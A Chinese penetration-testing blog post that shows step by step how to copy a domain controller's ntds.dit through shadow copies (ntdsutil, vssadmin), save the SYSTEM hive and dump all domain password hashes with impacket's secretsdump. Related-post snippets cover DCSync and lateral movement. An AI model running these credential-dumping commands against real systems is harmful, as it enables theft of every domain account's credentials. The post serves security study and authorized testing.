域渗透之影卷拷贝获取域内全部hash

已于 2024-03-13 23:30:25 修改
阅读量817 收藏 16
点赞数 22
文章标签: 网络安全 web安全 github windows
于 2024-03-13 23:28:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66717977/article/details/136694741
版权

更多更好的内容请关注微信公众号“猎洞时刻”!!!

请遵守网络安全法,禁止做非法渗透,如果有人利用文章技术做非法渗透,一切后果由自己承担!

简介

通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。(活动目录始终访问这个文件,所以文件被禁止读取,文件被锁定。)

使用Windows本地卷影拷贝服务(volume Shadow Copy Server,VSS),就可以获取文件的副本(类似于虚拟机的快照)。

ntds.dit文件位置: C:\\Windows\\NTDS\\NTDS.dit

ntds.dit介绍

1,ntds.dit文件是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。它包括域中所有用户的密码哈希。通过提取这些哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。这些密码的提取和破解可以脱机执行,因此将无法检测到。一旦攻击者提取了这些散列,它们便可以充当域上的任何用户,包括域管理员。

2,在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.dit。ntds.dit中包含用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被操作系统锁定的。

3,在一般情况下系统运维人员会利用卷影拷贝服务(volume Shadow Copy Server,VSS)实现ntds.dit的拷贝,VSS本质上属快照(Snamshot)技术的一种,主要用于备份和恢复(即使目标文件被系统锁定)。

图片

以下是两种影卷拷贝的方式,最后是提取文件中的hash值。

一、通过ntdsutil.exe提取ntds.dit

工具使用方法︰在域控制器的命令行环境下输入如下命令,创建一个快照,该快照包含Windows中的所有文件,且在复制文件时不会受到Windows锁定机制的限制。

1.1创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

图片

1.2挂载快照

    生成快照后,挂载快照可以使得你能够查看和访问该快照的内容,就像它是一个真实的卷一样。挂载是指将快照映射到现有计算机系统的目录树中。也就是说,它允许你像浏览存储在任何存储设备上的文件和目录一样来查看和操作被保存在快照中的数据。

    简单来说,挂载快照就是把快照作为一个虚拟的"硬盘"(或者说"驱动器")连接到系统上。这样,你就可以像访问本地磁盘一样来访问快照中的所有文件,执行必要的操作,甚至可以复制这些文件到其他磁盘上或其他主机上。

ntdsutil snapshot "mount {9368eb6a-631b-4e28-b25b-bc78b4674f49}" quit quit

图片

1.3复制ntds.dit

将快照中的ntds.dit文件提取出来!这样不受限制!

copy C:\$SNAP_202211280955_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds.dit

图片

快照和复制出来的ntds.dit都在C盘中。

图片

快照中的内容是整个机器全部的内容。

图片

1.4卸载快照

  • 卸载快照是指将已经挂载到系统中的快照从目录树中移除的操作。

  • 当你挂载一个快照后,它会被映射为一个虚拟的卷,可以通过系统来访问该快照中的文件和目录。当你完成对快照中数据的查看、操作或恢复后,可以选择卸载快照,将其从目录树中移除。

  • 卸载快照并不影响快照本身的存在,只是不再让系统能够直接访问快照中的内容。

ntdsutil snapshot "unmount {9368eb6a-631b-4e28-b25b-bc78b4674f49}" quit quit

图片

1.5删除快照

  • 删除快照是指彻底删除存储设备上的快照文件。

  • 快照通常是作为数据备份、故障恢复或版本控制的手段而存在的。当你不再需要某个特定的快照,或者由于存储空间的限制需要释放快照占用的空间时,可以选择删除快照。

  • 删除快照将永久性地从存储设备上删除这些快照文件,并且无法恢复。

ntdsutil snapshot "delete {9368eb6a-631b-4e28-b25b-bc78b4674f49}" quit quit

图片

二、利用vssadmin提取ntds.dit

2.1 创建C盘影卷副本

vssadmin create shadow /for=c:

图片

2.2 Copy出ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\ntds\ntds.dit c:\ntds.dit

图片

图片

2.3 删除快照

vssadmin delete shadows /for=c: /quiet

图片

三、解密并导出Hash

3.1 获取system.hive文件

最后还需要转储system.hive,system.hive中存放着ntds.dit的密钥,如果没有该密钥,将无法查看ntds.dit中的信息

reg save hklm\system system.hive

图片

图片

3.2 impacket工具包导出hash

impacket工具包的下载地址

https://github.com/SecureAuthCorp/impacket

图片

最后导出全部用户的hash

secretdump.py -system system.hive -ntds ntds.dit LOCAL

图片

更多更好的内容请关注微信公众号“猎洞时刻”!!!

CengLnH
关注
  • 22
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
安装impacket
天元喜羊羊的博客
07-07 8036
下载地址:http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket 用easy_install来安装: E:\python>easy_install impacket-0.9.9.9.zip Processing impacket-0.9.9.9.zip Writing
内网渗透--提取NTDS
qq_62169455的博客
09-24 601
NTDS.DIT:为DC的数据库,内容有用户、组、用户hash等信息,控上的ntds.dit只有可以登录到控上的用户(如管用户、DC本地管理员用户)可以访问,为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。位置:C:\Windows\NTDS文件和SAM文件类似,是不能直接读取的,也不能复制。
kali下载impacket
李安北的博客
04-16 4167
需要python3的环境 git clone https://github.com/CoreSecurity/impacket.git cd impacket/ python3 -m pip install . python3 setup.py install wmiexec.py:半交互式 shell,通过 Windows Management Instrumentation 使用。它不需要在目标服务器上安装任何服务/代理。以管理员身份运行。高度隐蔽。 wmiexec.py Administrato
impacket-Impacket是个使用网络协议进行工作的工具集合-python
06-18
impacket-Impacket是个使用网络协议进行工作的工具集合 什么是Impacket? Impacket 是一组用于处理网络协议的 Python 类。 Impacket 专注于提供对数据包和某些协议(例如 NMB、SMB1-3 和 MS-DCEPC)的低级编程访问协议实现本身。 数据包可以从头开始构建,也可以从原始数据中解析出来,面向对象的 API 使处理深层协议变得简单。 该库提供了一组工具作为可以在该库的上下文中完成的操作的示例。 可以在以下位置找到对某些工具的描述: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket 具有哪些协议? 以太网,Linux“熟”捕获。 IP、TCP、UDP、ICMP、IGMP、ARP。 (IPv4 和 IPv6)NMB 和 SMB1/2/3(高级实现)。 DCE/RPC 版本 4 和 5,通过不同的传输:UDP(版本 4 专用)、TCP、SMB/TCP、SMB/NetBIO
什么是DCSync
sangfor_edu的博客
10-28 666
环境中,控制之间每十五分钟就会进行一次数据同步。当控制A需要从控制器B获取数据时,会向其发送一个 GetNCChanges 请求,该请求包含了需要同步的数据,如果获取的数据较多,则会进行循环请求。DCSync是mimikatz在2015年添加的一个功能,利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges 接口模仿一个控制器向另一个控制器发起数据同步请求,能够用来导出内所有用户的hash
渗透完全技巧.pdf
10-03
卷影拷贝获取控所有hash) dpapi解密 2.内网信息收集 本机信息收集 8.获取当前用户密码 Windows Linux 浏览器 Navicat密码 xshell&xftp密码 mRemoteNG密码 扩散信息收集 常用端口扫描工具 内网拓扑架构分析 常见...
渗透——PassTheHash&PassTheKey
02-26
对于PassTheHash大家应该都很熟悉,在2014年5月发生了...在渗透中,Hash和Key尤为重要,对其获取和利用一直是攻防双方最主要的关注点,所以本次就从hash和key开始。控:内主机:在上篇LAPS中提到,如果内网主机的
windows渗透漏洞ppt
最新发布
10-19
Windows渗透漏洞ppt Windows渗透漏洞是指攻击者通过各种方式来获取Windows控制器中的敏感信息,包括管理员账户密码、用户账户信息、安全主体等。攻击者可以通过LDAP信息搜集、SPN扫描、外枚举用户...
John the Ripper 获取hash
10-06
John the Ripper 获取hash
横向批量at&schtasks&impacket 传递
mingyqf的博客
11-08 483
2008 r2 webserver web 服务器 本地管理员账号密码 :.\administraotr:admin!@#45 当前机器用户密码 :god\webadmin:admin!@#45 ------------------------------------- 2003 x86 fileserver 文件服务器 本地管理员账号密码 : administrator : admin 当前机器用户密码 :god\fileadmin : Admin12345 -----------...
impacket-0.9.9.9
05-05
impacket-0.9.9.9,官方版本
Impacket的使用
谢公子的博客
03-14 4478
Impacket Impacket是用于处理网络协议的Python类的集合,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。 项目地址:https...
内网渗透(四十九)之安全和跨攻击-多种方式离线读取ntds.dit文件中的hash
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-22 388
2、将ntds.dit文件放入libesedb-20210424文件夹内,导出 ntds.dit,两个重要的表为:datatable以及link_table,他们都会被存放在./ntds.dit.export/文件夹中。注意:因为 system.hive 里存放着 ntds.dit 的秘钥,所以需要转储 system.hive ,不然没法查看ntds.dit 里内容。将 ntds.dit.export 和 SYSTEM 文件还有ntds.dit放入到 和secretsdump.exe 同级目录下。
内网安全 - 内横向渗透之at&schtasks&impacket
acepanhuan的博客
03-14 802
内网安全 - 内横向渗透之at&schtasks&impacket
渗透】教你怎么利用DCSync导出内所有用户hash
HBohan的博客
08-13 911
前言 在之前的文章《渗透——DCSync》曾系统的整理过DCSync的利用方法,本文将要针对利用DCSync导出内所有用户hash这一方法进行详细介绍,分析不同环境下的利用思路,给出防御建议。 简介 本文将要介绍以下内容: ◼利用条件 ◼利用工具 ◼利用思路 ◼防御建议 利用条件 获得以下任一用户的权限: ◼Administrators组内的用户 ◼Domain Admins组内的用户 ◼Enterprise Admins组内的用户 ◼控制器的计算机帐户 利用工具 1.C实现(mimikatz) 实
impacket安装 python_Impacket网络协议工具包介绍
weixin_35715366的博客
12-23 1324
Impacket 是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。在本文的实验场景中,我们需要准备以下两个系统:1.配置控的Windows服务器;2. Kali Linux系统相关设置如下:Windows Server:...
ntds.dit文件获取与解密
热门推荐
Shanfenglan's blog
08-21 28万+
它们在哪儿? ntds.dit文件环境中控上会有的一个文件,这个文件存储着内所有用户的凭据信息(hash)。非环境也就是在工作组环境中,有一个sam文件存储着当前主机用户的密码信息,想要破解sam文件ntds.dit文件都需要拥有一个system文件ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit system文件位置:C:\Windows\System32\config\SYSTEM sam文件位置:C:\Windows\System32\config\SAM
8、渗透——获得控服务器的NTDS.dit文件
Fly_鹏程万里
06-11 2840
0x00 前言在之前的文章《导出当前内所有用户hash的技术整理》曾介绍过通过Volume Shadow Copy实现对ntds.dit文件的复制,可用来导出内所有用户hash。本文将尝试做系统总结,总结多种不同的方法。0x01 简介本文将要介绍以下内容:多种实现方法比较优缺点0x02 通过Volume Shadow Copy获得控服务器NTDS.dit文件测试系统:Server 2008 ...
用户密码过期只有hash,如何更新密码
05-24
如果只有密码哈希值而没有明文密码,那么更新密码的过程是比较麻烦的。以下是一些可能的方法: 1. 强制用户更改密码:你可以通过 Active Directory 中的策略来强制用户在下一次登录时更改其密码。这样做的原因是,当用户更改其密码时,其明文密码会被哈希并存储在 Active Directory 中。 2. 使用管理员帐户更改密码哈希:如果你是管理员,则可以使用特殊工具(例如 Mimikatz)来提取密码哈希值,并将其用于更新用户的密码。但是,请注意,这种方法存在安全风险,因为你需要将明文密码存储在某个地方以便使用。 3. 重置密码:最后一种方法是重置用户的密码。这种方法需要用户在下次登录时输入新密码。在这种情况下,用户的旧密码哈希将不再起作用,而新密码的哈希将被存储在 Active Directory 中。但是,这种方法可能会造成用户数据丢失,因为用户可能会忘记他们的旧密码,或者他们可能会使用与旧密码不同的新密码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值